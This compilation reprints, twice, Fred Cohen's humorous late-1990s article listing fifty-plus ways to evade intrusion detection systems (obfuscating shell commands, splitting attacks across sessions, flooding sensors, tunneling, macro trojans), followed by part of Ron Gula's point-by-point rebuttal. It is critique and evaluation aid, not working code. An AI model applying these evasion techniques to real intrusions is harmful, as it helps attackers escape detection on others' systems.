point during that panel discussion I stated that, while the idea of intrusion detection systems was an interesting one and one that
should be followed as a possible candidate for helping to address this challenge, current systems were so poor as to be not worth
the effort to implement them. (My actual words were a bit less polite, but you get the idea).
After the panel, I had to go to the airport straight away to make my plane. When I sat down, I was surprised to find both the
editor (Richard Power) and director (Patrice Rapaulus) of the Computer Security Institute sitting in the next row taking the same
set of flights back to San Francisco. As we discussed the conference and I mentioned the limited abilities of intrusion detection
systems, Richard joked that I could write an article on the 50 ways to bypass intrusion detection systems. I had written the 50
Ways to Attack Your World Wide Web Systems a few years earlier just before their fall conference. I know Richard was
surprised when I asked him when he needed it.
The deadline was in a few days and, since the plane ride was several hours long and I had my pocket computer in my pocket, I
told him I’d have it for him before the first stop. (Dallas - Fort Worth) I started typing and every few attacks read them a sample,
they laughed at the funnier ones, and it made the plane ride a bit more pleasant for an hour or so. When I finished the 50 ways
(plus a few bonus ways) I read the whole piece to them, they laughed at the funnier parts, and Richard had it in his email before he
got home.
Here then is the piece, more or less as it was when I Emailed it to them, complete with the original introduction. It was my hope
then as it is my hope now that you will both enjoy the humor in these weaknesses and appreciate the seriousness underlying them
at the same time.
Original Introduction:
In my ongoing attempt to cover the legal bills associated with trying to get Netscape to pay the $50,000 they should owe me for
demonstrating 50 ways to attack World Wide Web systems a few years back, I have been forced to write articles such as this
one for trade rags such as this one. In keeping with this most serious of tones, I introduce here, 50 ways to defeat modern (i.e.,
stone aged) intrusion detection systems.
Background:
From a standpoint of the network security manager, it is often difficult to tell the wheat from the chaff when selecting products or
deciding on capabilities. The current situation in intrusion detection is that very few managers know how to make a proper
decision and vendors seem to be taking advantage of this knowledge vacuum to make sales.
I have heard many claims and a wide range of prices for these systems, but the plain truth is that most current intrusion detection
technologies and systems available to the average buyer are poor at best. This seems to me to be a case where the emperor has
no clothes. Since exposing naked emperors is one of my goals in life, I thought it might be useful to provide decision-makers with
some ammunition to use in evaluating candidate systems. While I hope my playful tone is understood, the issues underlying these
examples are serious and these examples are only the tip of the iceberg.
The 50 Ways:
1 - Inserting extraneous characters into a standard attack typically causes detection failure. As an example, you could insert the
string ‘&& true’ into a typical shell command line without ill effect on operation but with degraded IDS performance.
2 - Use tabs instead of spaces in commands. Since most current systems don’t interpret all separators in the same way, changing
to non-standard separators can make them fail. You might also try ‘,’ instead of ‘;’ in the Unix shell.
3 – Closely related to number 2, you could change the separator character in the system so that (for example) % is the separator.
This would confuse detection systems almost without exception.
4 - Reorder a detected attack sequence. For example, if the attack goes ‘a;b;c’ and it would also work as ‘b;a;c’, most detection
systems would rank the one they were not tuned to find as unlikely to be an actual attack.
5 - Split a standard attack across more than one user. Using the ‘a;b;c’ example above, if user X types ‘a;b’ and user Y types ‘c’
the attack is almost certain to go undetected.
6 - Split a standard attack across multiple sessions. Login once and type ‘a;b’, logout, then login and type ‘c’.
7 - Split across multiple remote IP addresses/systems. Login from sites X and Y, and type ‘a’ from site X, ‘b’ from site Y, and ‘c’
from site X.
8 - Define a macro for a command used in a standard attack. For example, set a shell variable called ‘$ZZ’ to ‘cp’ and then use
‘$ZZ’ instead of ‘cp’ where appropriate.
9 - Define a macro for a parameter in a standard attack. For example, use the name ‘$P’ instead of the string ‘/etc/passwd’.
10 – Create shell scripts to replace commands you use. If you do this carefully, the detector will not associate the names you use
for the scripts to the commands and will miss the whole attack.
Bonus attack - Add comments to attack lines in an attack that would otherwise be detected.
11 - Use different commands to do the same function. For example, ‘echo *’ is almost the same as ‘ls’ in the Unix shell.
12 - Change the names in standard attacks. For example, if the standard attack uses a temporary file named ‘xxx’, try using ‘yyy’.
13 - Create a code-book translater for attack keywords. This can be done by piping all commands through a filter program –
perhaps using ‘sed’ to do string substitution.
14 - Encode the attacks in ‘ebcdic’ and change terminal types to an ‘ebcdic’ terminal. Since all the characters are differently
coded, the detector will be unable to decode your actions.
15 – Encrypt your attacks – for example, by using the secure shell facilities intended to increase protection by preventing snooping
– including snooping by the IDS.
16 - Use a postfix notation for transmissions, and then translate back at the other end. The detector will not be able to understand
the syntax.
17 - Turn on full duplex communications mode wit the target. The extra characters going back and forth may confuse the IDS.
18 - Intermix several known intrusion techniques by alternating one instruction from each. The IDS is likely not to recognize any of
the attacks.
19 – encode results sent by daemons so that the patterns of what is returned cannot be used for detection. For example, instead
of mailing yourself a password file by exploiting a sendmail bug, pipe the password file through a sed script that changes the ‘:’s to
‘-‘s.
20 - Attack by piping everything through an awk script that exchanges characters. This will confuse the IDS.
Bonus attack - Run commands selected from a table by the row number and have the victim system do the command-line calls.
So you might send ’15 *.com’ and the victim system might do ‘dir *.com’.
21 - Overwhelm the IDS sensor ports. For example, by using an echo virus against a UDP port, you might make the sensor port
unable to receive further sensor inputs.
22 - Crash the IDS with ping packets. By sending long IPNG packets, many systems that run IDS systems can be crashed,
causing them to fail to detect subsequent attacks.
23 – Kill the IDS by attacking its platform. Most IDS systems run on regular hosts which can themselves be attacked. Once the
platform is taken over, the IDS can be subverted.
24 - Create false audit records to confuse the IDS. For example, send packets to the IDS in between the packets that might
indicate an attack and containing information makes the attack actions look harmless.
25 - Consume all IDS disk space then launch for real. By (for example) overrunning the disk space consumed by the IDS with
innocuous but detected sequences, the IDS will fail and subsequent attacks go undetected.
26 - Stop the generation or collection of audit records then attack. For example, by creating a large number of processes, the
system running the IDS may not be able to create the process needed to generate an audit record.
27 - Cause the response system to disrupt normal communications. For example, some IDS systems respond to repeated attacks
from a site by cutting off all traffic from that site. By forging malicious traffic coming from a particular host, the IDS may cut off all
traffic from that host, after which it can be attacked at will.
28 - Type everything in backwards and use a translator program to reverse it. Do the same in transmissions sent back to you.
29 - Type everything in infix notation and have it translated via ‘awk’ into prefix notation. The IDS may be unable to interpret the
traffic.
30 - Use ‘emacs’ as the shell and use wipes and yanks in and out of the ‘cmd’ buffer instead of typing. The IDS will see things
like control-W and control-Y while the command interpreter on the victim site will see malicious commands.
Bonus attack - Type very slowly (over a period of hours per command line should do nicely). Since buffer sizes are limited, your
traffic may be lost in the glut of other things the IDS has to watch.
31 - Change routes to target to avoid the IDS.
32 - Change return routes from target to avoid the IDS.
33 – Use source routing to reroute each packet through a different path to the victim, thus avoiding any single IDS.
34 - Start an outbound session from the victim via a modem and attack over that connection. If the IDS is network-based, it will
miss these packets.
35 - Interfere with the infrastructure between the victim and the IDS. In remote monitoring and network-based IDS systems, this
is often possible by modifying router traffic (as a simple example).
36 - Break into an intermediary to break the traceback of the attack. The intrusion may be detected, but they won’t be able to
trace it to you (unless they are very good at traces).
37 - Start a session on an unusual IP port. These ports are often not understood or watched by IDS systems.
38 - Use a modified protocol for communications, such as one that reverses bytes on words. (See PDP-11 and VAX encodings
for examples).
39 - Use IPX over IP for the attack. The IDS will probably only notice the IP packets and not understand the content.
40 - Use a different tunneled protocol session for the attack – such as IP over HTML.
Bonus Attack - Define your own protocol for a new application and attack over it.
41 - Attack over dial-ins instead of a network. Network-based IDS systems will never notice this activity.
42 - Create large numbers of false positives to increase noise level. This will make finding the real attack human time intensive and
people tend to fail under these circumstances.
43 - Plant the intrusion instructions within a Word macro and send a document to the victim. The IDS probably can’t decode the
attack inside the macro.
44 - Plant the intrusion code within another macro and send to victim. Power point perhaps, or 123, or … you get the idea.
45 - Put the attack in a compiled program (i.e., a Trojan Horse) and get the victim to download the attack and run it for you.
46 - Use a rarely used protocol for the attack. Chances are the IDS doesn’t know how to interpret the packets.
47 - Recode the attack in a different language than it was originally published in.
48 – Use any non-technical attack (such as so-called human engineering). Since the IDS only looks at bits and bytes, it doesn’t
detect many of the common attacks used by attackers today.
49 - Attack any system that doesn't run Unix. Since almost all of today’s IDS systems only look for Unix attacks, everything else
will pass undetected. (Some apparently detect NT attacks now as well.)
50-1000+ - Use one of the 1000 or so published attacks not detected by current systems. The largest number of detected attacks
I have seen advertised to date as being detected by any such system is only about 50. (One vendor recently claimed over 150, but
the newest numbers I heard for known vulnerabilities has gone up to 2,000) Nevertheless, 150 is progress over 50!
Bonus attacks - 1000+ to infinity - Create a new attack script. IDS systems today almost all look only for a small number of
known attacks.
Afterward:
This ends the original article sent to the Computer Security Institute, but it doesn’t even start to end the story of what happened
later. It ended up that the URL for this article was sent to a mailing list for principal investigators funded in the intrusion detection
research area. It seems that some of them have not yet mastered the art of laughing at themselves and were more than a bit upset
at my statements. Others were quite whimsical, and still others took a serious tone but were not offended by the content.
What was strange to me was that I led a serious study of intrusion detection systems less than a year earlier and had the results
reviewed by these same folks. Almost none of them had more than a passing comment on the technical paper that indicated all of
the weaknesses described in this article and a large class of other ones. While I rarely do such a thing, I will quote here from a
private email I sent to one of these folks:
Pretty strange to watch all this commentary in the research community over a paper intended as a humorous poke at
vendors trying to sell poor quality solutions to unsuspecting computer security managers at companies. The serious
paper is the national infosec technical baseline, but it apparently engendered no such discussion.
When will I learn that people ignore my serious work and pay lots of attention to my play pieces.
Summary and Conclusions:
I have a policy of always delivering a little bit more than I promise. While at least one early reader of this article declared that I
could not count, they also asserted that there were only 40 ways listed in the article. When I read the comment I immediately went
back and recounted, and I am pretty sure I have exceeded my goal of 50 ways.
If you laughed at some of these attacks, I am glad, because many of the current intrusion detection systems are, in my opinion,
laughable. If you are offended by my disregard for the products available today, you are probably a vendor in this field wishing I
hadn’t told all those decision makers how to ask the tough questions about your product.
The major conclusion that I draw from the 50 ways is that intrusion detection is still in its infancy. In many cases, products are
simply not ready for prime time, and in other cases, the efforts required to make them viable in your business are not justified by
the acquisition, configuration, or operation costs.
I hope you have enjoyed this holiday article and that you will enjoy and prosper throughout the coming year. Happy holidays.
About The Author:
Fred Cohen is a Principal Member of Technical Staff at Sandia National Laboratories and a Senior Partner of Fred Cohen and
Associates in Livermore California, an executive consulting and education group specializing in information protection. He can be
reached by sending email to fc@all.net.
Managing Network Security
50 Ways to Defeat
Your Intrusion Detection System
by
Fred Cohen of Fred Cohen & Associates (fc@all.net) http://all.net/
Series Introduction
Over the last several years, computing has changed to an almost purely networked environment, but the technical aspects of
information protection have not kept up. As a result, the success of information security programs has increasingly become a
function of our ability to make prudent management decisions about organizational activities. Managing Network Security takes a
management view of protection and seeks to reconcile the need for security with the limitations of technology.
Background and Introduction:
This article is based on a short piece I wrote a few weeks ago on an airplane on the way back from the National Computer
Security Center / National Institute of Science and Technology conference.
I was one of 12 speakers on a panel discussion about how to protect networks when the style of computing involves loading
untrusted executable programs from over the Internet into network browsers running on computers inside the firewall. At some
point during that panel discussion I stated that, while the idea of intrusion detection systems was an interesting one and one that
should be followed as a possible candidate for helping to address this challenge, current systems were so poor as to be not worth
the effort to implement them. (My actual words were a bit less polite, but you get the idea).
After the panel, I had to go to the airport straight away to make my plane. When I sat down, I was surprised to find both the
editor (Richard Power) and director (Patrice Rapaulus) of the Computer Security Institute sitting in the next row taking the same
set of flights back to San Francisco. As we discussed the conference and I mentioned the limited abilities of intrusion detection
systems, Richard joked that I could write an article on the 50 ways to bypass intrusion detection systems. I had written the 50
Ways to Attack Your World Wide Web Systems a few years earlier just before their fall conference. I know Richard was
surprised when I asked him when he needed it.
The deadline was in a few days and, since the plane ride was several hours long and I had my pocket computer in my pocket, I
told him I’d have it for him before the first stop. (Dallas - Fort Worth) I started typing and every few attacks read them a sample,
they laughed at the funnier ones, and it made the plane ride a bit more pleasant for an hour or so. When I finished the 50 ways
(plus a few bonus ways) I read the whole piece to them, they laughed at the funnier parts, and Richard had it in his email before he
got home.
Here then is the piece, more or less as it was when I Emailed it to them, complete with the original introduction. It was my hope
then as it is my hope now that you will both enjoy the humor in these weaknesses and appreciate the seriousness underlying them
at the same time.
Original Introduction:
In my ongoing attempt to cover the legal bills associated with trying to get Netscape to pay the $50,000 they should owe me for
demonstrating 50 ways to attack World Wide Web systems a few years back, I have been forced to write articles such as this
one for trade rags such as this one. In keeping with this most serious of tones, I introduce here, 50 ways to defeat modern (i.e.,
stone aged) intrusion detection systems.
Background:
From a standpoint of the network security manager, it is often difficult to tell the wheat from the chaff when selecting products or
deciding on capabilities. The current situation in intrusion detection is that very few managers know how to make a proper
decision and vendors seem to be taking advantage of this knowledge vacuum to make sales.
I have heard many claims and a wide range of prices for these systems, but the plain truth is that most current intrusion detection
technologies and systems available to the average buyer are poor at best. This seems to me to be a case where the emperor has
no clothes. Since exposing naked emperors is one of my goals in life, I thought it might be useful to provide decision-makers with
some ammunition to use in evaluating candidate systems. While I hope my playful tone is understood, the issues underlying these
examples are serious and these examples are only the tip of the iceberg.
The 50 Ways:
1 - Inserting extraneous characters into a standard attack typically causes detection failure. As an example, you could insert the
string ‘&& true’ into a typical shell command line without ill effect on operation but with degraded IDS performance.
2 - Use tabs instead of spaces in commands. Since most current systems don’t interpret all separators in the same way, changing
to non-standard separators can make them fail. You might also try ‘,’ instead of ‘;’ in the Unix shell.
3 – Closely related to number 2, you could change the separator character in the system so that (for example) % is the separator.
This would confuse detection systems almost without exception.
4 - Reorder a detected attack sequence. For example, if the attack goes ‘a;b;c’ and it would also work as ‘b;a;c’, most detection
systems would rank the one they were not tuned to find as unlikely to be an actual attack.
5 - Split a standard attack across more than one user. Using the ‘a;b;c’ example above, if user X types ‘a;b’ and user Y types ‘c’
the attack is almost certain to go undetected.
6 - Split a standard attack across multiple sessions. Login once and type ‘a;b’, logout, then login and type ‘c’.
7 - Split across multiple remote IP addresses/systems. Login from sites X and Y, and type ‘a’ from site X, ‘b’ from site Y, and ‘c’
from site X.
8 - Define a macro for a command used in a standard attack. For example, set a shell variable called ‘$ZZ’ to ‘cp’ and then use
‘$ZZ’ instead of ‘cp’ where appropriate.
9 - Define a macro for a parameter in a standard attack. For example, use the name ‘$P’ instead of the string ‘/etc/passwd’.
10 – Create shell scripts to replace commands you use. If you do this carefully, the detector will not associate the names you use
for the scripts to the commands and will miss the whole attack.
Bonus attack - Add comments to attack lines in an attack that would otherwise be detected.
11 - Use different commands to do the same function. For example, ‘echo *’ is almost the same as ‘ls’ in the Unix shell.
12 - Change the names in standard attacks. For example, if the standard attack uses a temporary file named ‘xxx’, try using ‘yyy’.
13 - Create a code-book translater for attack keywords. This can be done by piping all commands through a filter program –
perhaps using ‘sed’ to do string substitution.
14 - Encode the attacks in ‘ebcdic’ and change terminal types to an ‘ebcdic’ terminal. Since all the characters are differently
coded, the detector will be unable to decode your actions.
15 – Encrypt your attacks – for example, by using the secure shell facilities intended to increase protection by preventing snooping
– including snooping by the IDS.
16 - Use a postfix notation for transmissions, and then translate back at the other end. The detector will not be able to understand
the syntax.
17 - Turn on full duplex communications mode wit the target. The extra characters going back and forth may confuse the IDS.
18 - Intermix several known intrusion techniques by alternating one instruction from each. The IDS is likely not to recognize any of
the attacks.
19 – encode results sent by daemons so that the patterns of what is returned cannot be used for detection. For example, instead
of mailing yourself a password file by exploiting a sendmail bug, pipe the password file through a sed script that changes the ‘:’s to
‘-‘s.
20 - Attack by piping everything through an awk script that exchanges characters. This will confuse the IDS.
Bonus attack - Run commands selected from a table by the row number and have the victim system do the command-line calls.
So you might send ’15 *.com’ and the victim system might do ‘dir *.com’.
21 - Overwhelm the IDS sensor ports. For example, by using an echo virus against a UDP port, you might make the sensor port
unable to receive further sensor inputs.
22 - Crash the IDS with ping packets. By sending long IPNG packets, many systems that run IDS systems can be crashed,
causing them to fail to detect subsequent attacks.
23 – Kill the IDS by attacking its platform. Most IDS systems run on regular hosts which can themselves be attacked. Once the
platform is taken over, the IDS can be subverted.
24 - Create false audit records to confuse the IDS. For example, send packets to the IDS in between the packets that might
indicate an attack and containing information makes the attack actions look harmless.
25 - Consume all IDS disk space then launch for real. By (for example) overrunning the disk space consumed by the IDS with
innocuous but detected sequences, the IDS will fail and subsequent attacks go undetected.
26 - Stop the generation or collection of audit records then attack. For example, by creating a large number of processes, the
system running the IDS may not be able to create the process needed to generate an audit record.
27 - Cause the response system to disrupt normal communications. For example, some IDS systems respond to repeated attacks
from a site by cutting off all traffic from that site. By forging malicious traffic coming from a particular host, the IDS may cut off all
traffic from that host, after which it can be attacked at will.
28 - Type everything in backwards and use a translator program to reverse it. Do the same in transmissions sent back to you.
29 - Type everything in infix notation and have it translated via ‘awk’ into prefix notation. The IDS may be unable to interpret the
traffic.
30 - Use ‘emacs’ as the shell and use wipes and yanks in and out of the ‘cmd’ buffer instead of typing. The IDS will see things
like control-W and control-Y while the command interpreter on the victim site will see malicious commands.
Bonus attack - Type very slowly (over a period of hours per command line should do nicely). Since buffer sizes are limited, your
traffic may be lost in the glut of other things the IDS has to watch.
31 - Change routes to target to avoid the IDS.
32 - Change return routes from target to avoid the IDS.
33 – Use source routing to reroute each packet through a different path to the victim, thus avoiding any single IDS.
34 - Start an outbound session from the victim via a modem and attack over that connection. If the IDS is network-based, it will
miss these packets.
35 - Interfere with the infrastructure between the victim and the IDS. In remote monitoring and network-based IDS systems, this
is often possible by modifying router traffic (as a simple example).
36 - Break into an intermediary to break the traceback of the attack. The intrusion may be detected, but they won’t be able to
trace it to you (unless they are very good at traces).
37 - Start a session on an unusual IP port. These ports are often not understood or watched by IDS systems.
38 - Use a modified protocol for communications, such as one that reverses bytes on words. (See PDP-11 and VAX encodings
for examples).
39 - Use IPX over IP for the attack. The IDS will probably only notice the IP packets and not understand the content.
40 - Use a different tunneled protocol session for the attack – such as IP over HTML.
Bonus Attack - Define your own protocol for a new application and attack over it.
41 - Attack over dial-ins instead of a network. Network-based IDS systems will never notice this activity.
42 - Create large numbers of false positives to increase noise level. This will make finding the real attack human time intensive and
people tend to fail under these circumstances.
43 - Plant the intrusion instructions within a Word macro and send a document to the victim. The IDS probably can’t decode the
attack inside the macro.
44 - Plant the intrusion code within another macro and send to victim. Power point perhaps, or 123, or … you get the idea.
45 - Put the attack in a compiled program (i.e., a Trojan Horse) and get the victim to download the attack and run it for you.
46 - Use a rarely used protocol for the attack. Chances are the IDS doesn’t know how to interpret the packets.
47 - Recode the attack in a different language than it was originally published in.
48 – Use any non-technical attack (such as so-called human engineering). Since the IDS only looks at bits and bytes, it doesn’t
detect many of the common attacks used by attackers today.
49 - Attack any system that doesn't run Unix. Since almost all of today’s IDS systems only look for Unix attacks, everything else
will pass undetected. (Some apparently detect NT attacks now as well.)
50-1000+ - Use one of the 1000 or so published attacks not detected by current systems. The largest number of detected attacks
I have seen advertised to date as being detected by any such system is only about 50. (One vendor recently claimed over 150, but
the newest numbers I heard for known vulnerabilities has gone up to 2,000) Nevertheless, 150 is progress over 50!
Bonus attacks - 1000+ to infinity - Create a new attack script. IDS systems today almost all look only for a small number of
known attacks.
Afterward:
This ends the original article sent to the Computer Security Institute, but it doesn’t even start to end the story of what happened
later. It ended up that the URL for this article was sent to a mailing list for principal investigators funded in the intrusion detection
research area. It seems that some of them have not yet mastered the art of laughing at themselves and were more than a bit upset
at my statements. Others were quite whimsical, and still others took a serious tone but were not offended by the content.
What was strange to me was that I led a serious study of intrusion detection systems less than a year earlier and had the results
reviewed by these same folks. Almost none of them had more than a passing comment on the technical paper that indicated all of
the weaknesses described in this article and a large class of other ones. While I rarely do such a thing, I will quote here from a
private email I sent to one of these folks:
Pretty strange to watch all this commentary in the research community over a paper intended as a humorous poke at
vendors trying to sell poor quality solutions to unsuspecting computer security managers at companies. The serious
paper is the national infosec technical baseline, but it apparently engendered no such discussion.
When will I learn that people ignore my serious work and pay lots of attention to my play pieces.
Summary and Conclusions:
I have a policy of always delivering a little bit more than I promise. While at least one early reader of this article declared that I
could not count, they also asserted that there were only 40 ways listed in the article. When I read the comment I immediately went
back and recounted, and I am pretty sure I have exceeded my goal of 50 ways.
If you laughed at some of these attacks, I am glad, because many of the current intrusion detection systems are, in my opinion,
laughable. If you are offended by my disregard for the products available today, you are probably a vendor in this field wishing I
hadn’t told all those decision makers how to ask the tough questions about your product.
The major conclusion that I draw from the 50 ways is that intrusion detection is still in its infancy. In many cases, products are
simply not ready for prime time, and in other cases, the efforts required to make them viable in your business are not justified by
the acquisition, configuration, or operation costs.
I hope you have enjoyed this holiday article and that you will enjoy and prosper throughout the coming year. Happy holidays.
About The Author:
Fred Cohen is a Principal Member of Technical Staff at Sandia National Laboratories and a Senior Partner of Fred Cohen and
Associates in Livermore California, an executive consulting and education group specializing in information protection. He can be
reached by sending email to fc@all.net.
@HWA
105.0 50 reasons IDS systems work by Ron Gula
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"50 Reasons IDS Systems Work"
Comment and review of the article, "50 Ways to Defeat Your Intrusion Detection System" authored by Fred Cohen.
By Ron Gula
June 1999
Several of our customer's have pointed out an excellent article about weaknesses in intrusion detection by
Fred Cohen entitled " 50 Ways to Defeat Your Intrusion Detection System". All fifty ways are included in
this paper, but the original version can be downloaded from http://all.net if so desired. In the paper, Mr.
Cohen states " . while the idea of intrusion detection systems was an interesting one and one that should
be followed as a possible candidate for helping to address this challenge, current systems were so poor as to
be not worth the effort to implement them. " Mr. Cohen was claiming that intrusion detection was of little
use in helping increase or manage network security. The paper then lists 55 techniques that an attacker can
use to bypass intrusion detection systems.
This article comments on each of the 55 techniques. Many of these techniques are either irrelevant or
simply don't work. Almost all of the attacks are techniques that can be deployed with pre-existing system
access. A significant percentage of them are techniques one can use to abuse a pre-established Telnet
session. Our intent is to educate readers by providing a different perspective of network and computer
intrusion detection systems.
The 50 Ways:
1 - Inserting extraneous characters into a standard attack typically causes detection failure. As an example,
you could insert the string '&& true' into a typical shell command line without ill effect on operation but
with degraded IDS performance.
In general, this is only true if the attack medium can accept extra benign characters. For example, the PHF
web attack uses a string of '/cgi-bin/phf'. There aren't any characters that can be prefixed or appended that
will cause a web server to still accept the URL. In the above example, if one were to exploit the older AIX
'tprof' get-root, the 'tprof' program would need to be invoked at some point. Any IDS that matched on that
word would have a positive match. Very few IDS systems look for complex attacks. They look for the
smaller pieces of the attack.
2 - Use tabs instead of spaces in commands. Since most current systems don't interpret all separators in the
same way, changing to non-standard separators can make them fail. You might also try ',' instead of ';' in
the Unix shell.
Same as number one. Using several tabs to run the 'tprof' program still requires 'tprof' to appear in a
command line. And that can cause a host or network based IDS to detect the attack.
3 - Closely related to number 2, you could change the separator character in the system so that (for
example) % is the separator. This would confuse detection systems almost without exception.
This requires modification of the IFS (internal field separator) environment variable. Many host based IDS
products alert on modification of this field. Most network based IDS products don't concentrate on these
sort of attacks. However, the attacks described in 1,2 and 3 would not effect host-based IDS products such
as Tripwire, Stalker and CMDS.
4 - Reorder a detected attack sequence. For example, if the attack goes 'a;b;c' and it would also work as
'b;a;c', most detection systems would rank the one they were not tuned to find as unlikely to be an actual
attack.
Logically this is an appealing argument, however modern vulnerabilities are usually exploited in one step.
These vulnerabilities can be identified by many different IDS products. More complex attacks are also
likely to have a few of their individual steps detected by an IDS.
5 - Split a standard attack across more than one user. Using the 'a;b;c' example above, if user X types 'a;b'
and user Y types 'c' the attack is almost certain to go undetected.
Again, if steps 'a', 'b' or 'c' are required to do an attack, then it is likely that an IDS will pick up on at least
one of them, regardless of which user executes it. Using multiple accounts does confuse security operators,
but exploits still tend to be detected.
6 - Split a standard attack across multiple sessions. Login once and type 'a;b', logout, then login and type 'c'.
Same as #5. Get-root exploit scripts can be multiple lines long, but the bottom line is that they really only
do the exploiting on one line. For example, there has to be a command that causes a user to go from a non-
privileged user to a super user.
7 - Split across multiple remote IP addresses/systems. Login from sites X and Y, and type 'a' from site X, 'b'
from site Y, and 'c' from site X.
Again, same as #5 and #6. The extra traffic may also raise the interest of a network based IDS. And IDS
products such as CMDS will notice multiple remote accesses from different locations in a small amount of
time.
8 - Define a macro for a command used in a standard attack. For example, set a shell variable called '$ZZ'
to 'cp' and then use '$ZZ' instead of 'cp' where appropriate.
Adds complexity, but an IDS should be able detect the access. Imagine an IDS that triggers on the 'tprof'
program. It will log an event when it is used in a macro assignment. The same is true for methods that
redefine a shell variable for the /etc/passwd file. Any IDS that triggers on access to the /etc/passwd file in a
Telent session would alert on that event. And again, these techniques do little to stop detection in the face
of host based IDS systems such as CMDS, Stalker and Tripwire.
9 - Define a macro for a parameter in a standard attack. For example, use the name '$P' instead of the string
'/etc/passwd'.
See #8.
10 - Create shell scripts to replace commands you use. If you do this carefully, the detector will not
associate the names you use for the scripts to the commands and will miss the whole attack.
This is the first real technique that is actual possible. Unfortunately, it does not address what happens after
the attack has succeeded. Tools such as CMDS will detect login sessions that are out of character. Tripwire
will detect any backdoors. Renaming tools such as 'nmap' and 'strobe' is a good idea, but as soon as they
are used, a network based IDS will pick them up.
------------------------------------------------------------------------
Bonus attack - Add comments to attack lines in an attack that would otherwise be detected.
------------------------------------------------------------------------
If the attack is referring to a get-root exploit script, then most IDS products are robust enough to detect
variations in the attack. This was discussed in 4,5,6 and 7.
11 - Use different commands to do the same function. For example, 'echo *' is almost the same as 'ls' in the
Unix shell.
One would still need to run 'tprof ' if one were to exploit it. Even if one were to compile a binary program
on a different system than simply run the 'trpof' program, many different IDS systems such as Stalker and
SeOS would see the unauthorized transition from an unprivileged user to a root user.
12 - Change the names in standard attacks. For example, if the standard attack uses a temporary file named
'xxx', try using 'yyy'.
This assumes that an IDS is searching for to specific of an exploit. See 11.
13 - Create a code-book translator for attack keywords. This can be done by piping all commands through a
filter program - perhaps using 'sed' to do string substitution.
See 11.
14 - Encode the attacks in 'ebcdic' and change terminal types to an 'ebcdic' terminal. Since all the characters
are differently coded, the detector will be unable to decode your actions.
See 11.
15 - Encrypt your attacks - for example, by using the secure shell facilities intended to increase protection
by preventing snooping - including snooping by the IDS.
This is only true for network based IDS systems. Host based systems have full access to a user's actions
under Secure Shell.
16 - Use a postfix notation for transmissions, and then translate back at the other end. The detector will not
be able to understand the syntax.
See 15.
17 - Turn on full duplex communications mode with the target. The extra characters going back and forth
may confuse the IDS.
Dragon, T-Sight and all versions of the DoD NID program are not vulnerable to this.
18 - Intermix several known intrusion techniques by alternating one instruction from each. The IDS is
likely not to recognize any of the attacks.
Or it is more likely to recognize at least one of the attacks. This is very similar to 5, 6 and 7 and is not a
new technique.
19 - Encode results sent by daemons so that the patterns of what is returned cannot be used for detection.
For example, instead of mailing yourself a password file by exploiting a sendmail bug, pipe the password
file through a sed script that changes the ':'s to '-'s.
The bug still needs to be exploited. What happens to the password file after the exploit is interesting, but
not directly part of the exploit.
20 - Attack by piping everything through an awk script that exchanges characters. This will confuse the
IDS.
Same as 15. This is not a new attack.
------------------------------------------------------------------------
Bonus attack - Run commands selected from a table by the row number and have the victim system do the
command-line calls. So you might send '15 *.com' and the victim system might do 'dir *.com'.
------------------------------------------------------------------------
Same as 15. This is just a new way of encrypting shell commands.
21 - Overwhelm the IDS sensor ports. For example, by using an echo virus against a UDP port, you might
make the sensor port unable to receive further sensor inputs.
Most network based IDS products are deployed securely and many have the ability to implement sensor
interfaces without IP stacks. Some of the IDS products, such as Dragon, don't even have any open UDP or
TCP ports. RealSecure, NetProwler, and NetRanger also could unbind the IP stack to prevent compromise.
22 - Crash the IDS with ping packets. By sending long PING packets, many systems that run IDS systems
can be crashed, causing them to fail to detect subsequent attacks.
A second denial of service technique is not a new way to defeat an IDS. Elaborating on 21, most network
IDS platforms are stripped down and deployed in a higher state of security than the surrounding network
environment. Although, I'm sure there are many network IDS systems running on Windows NT servers that
have been deployed out of the box and vulnerable to many DoS and other attacks.
23 - Kill the IDS by attacking its platform. Most IDS systems run on regular hosts which can themselves be
attacked. Once the platform is taken over, the IDS can be subverted.
How is this different than 22 and 21?
24 - Create false audit records to confuse the IDS. For example, send packets to the IDS in between the
packets that might indicate an attack and containing information that makes the attack actions look
harmless.
SNI wrote an excellent paper on this topic. NFR and Dragon network based IDS systems are not vulnerable
to these attacks. And in general, host based IDS products have never been vulnerable to these attacks.
25 - Consume all IDS disk space then launch for real. By (for example) overrunning the disk space
consumed by the IDS with innocuous but detected sequences, the IDS will fail and subsequent attacks go
undetected.
How can one tell when a passive network IDS has crashed? If the IDS is logging all this data, it will also
probably be noticed by someone if they have a clue. The last thing that an attacker wants to do is raise the
awareness of network defenders.
26 - Stop the generation or collection of audit records then attack. For example, by creating a large number
of processes, the system running the IDS may not be able to create the process needed to generate an audit
record.
This is a localized denial of service attack. Many UNIX operating systems are resistant to these local
attacks. Host based IDS products that use single processes are also immune. More likely, if this is a heavily
used server, the high number of processes will be noticed by an administrator.
27 - Cause the response system to disrupt normal communications. For example, some IDS systems
respond to repeated attacks from a site by cutting off all traffic from that site. By forging malicious traffic
coming from a particular host, the IDS may cut off all traffic from that host, after which it can be attacked
at will.
This is my favorite attack described in Mr. Cohen's article. If I understand this correctly, this example tries
to use the IDS's automatic blocking of IP addresses against the defended network. Some IDS products such
as CMDS, NetRanger, NetProwler and RealSecure can "speak" with firewalls and routers. When certain
events occur, the routers and firewalls can be asked to restrict traffic from a particular host. There are
some traffic flow problems with this technique, namely firewalls and IDS systems typically work on the
perimeter of a defended network. When traffic is restricted, it is inbound traffic. The target host will not be
isolated for attack.
28 - Type everything in backwards and use a translator program to reverse it. Do the same in transmissions
sent back to you.
Same as 15. This is just a new way to disguise shell commands.
29 - Type everything in infix notation and have it translated via 'awk' into prefix notation. The IDS may be
unable to interpret the traffic.
Same as 15. Both 28 and 29 only apply when a network based IDS is watching a Telnet or Rlogin session.
These techniques can not be easily replicated on FTP, HTTP, SMTP and many other protocols.
30 - Use 'emacs' as the shell and use wipes and yanks in and out of the 'cmd' buffer instead of typing. The
IDS will see things like control-W and control-Y while the command interpreter on the victim site will see
malicious commands.
NFR and RealSecure detect the use of 'emacs' because anyone who doesn't use 'vi' is obviously a hacker.
No seriously, this attack is just another way to hide "in plain sight" over a Telnet or Rlogin session.
------------------------------------------------------------------------
Bonus attack - Type very slowly (over a period of hours per command line should do nicely). Since buffer
sizes are limited, your traffic may be lost in the glut of other things the IDS has to watch.
------------------------------------------------------------------------
